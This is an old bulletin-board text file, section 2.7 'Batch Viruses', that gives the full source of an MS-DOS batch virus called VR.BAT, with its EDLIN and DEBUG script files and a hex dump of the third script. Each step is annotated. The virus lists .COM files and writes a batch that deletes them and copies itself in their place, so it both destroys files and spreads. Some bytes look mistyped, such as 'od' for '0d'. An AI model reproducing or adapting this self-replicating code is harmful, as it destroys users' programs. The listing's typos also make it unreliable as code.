[2.7]

                           Batch Viruses
                           -------------


Whoever thought that viruses could be in BATCH file.This virus which we

are about to see makes use of MS-DOS operating system. This BATCH virus
uses DEBUG & EDLIN programs.

Name: VR.BAT

echo = off         ( Self explanatory)
ctty nul           ( This is important. Console output is turned off)
path c:\msdos      ( May differ on other systems )
dir *.com/w>ind    ( The directory is written on "ind" ONLY name entries)

edlin ind<1        ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2        ( New batch program is created with debug)
edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
ctty con           ( Console interface is again assigned)
name               ( Newly created NAME.BAT is called.


In addition to file to this Batch file,there command files,here named 1,2,3

Here is the first command file:
-------------------------------
Name: 1

1,4d               ( Here line 1-4 of the "IND" file are deleted )
e                  ( Save file )

Here is the second command file:
--------------------------------
Name: 2

m100,10b,f000      (First program name is moved to the F000H address to save)

e108 ".BAT"        (Extention of file name is changed to .BAT)
m100,10b,f010      (File is saved again)
e100"DEL "         (DEL command is written to address 100H)
mf000,f00b,104     (Original file is written after this command)
e10c 2e            (Period is placed in from of extension)
e110 0d,0a         (Carrige return+ line feed)
mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a         (COPY command terminated with carriage return + lf)
rxc                ( The CX register is ... )
2c                 ( set to 2CH)
nname.bat          ( Name it NAME.BAT)
w                  ( Write )
q                  ( quit )


The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
      1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
      y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
      y  y  y  y     .  E  .  .  .  .  .  .  .  .  .


In order for this virus to work VR.BAT should be in the root. This program
only affects .COM files.

Downloaded From P-80 International Information Systems 304-744-2253

You are viewing proxied material from infinitelyremote.com. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.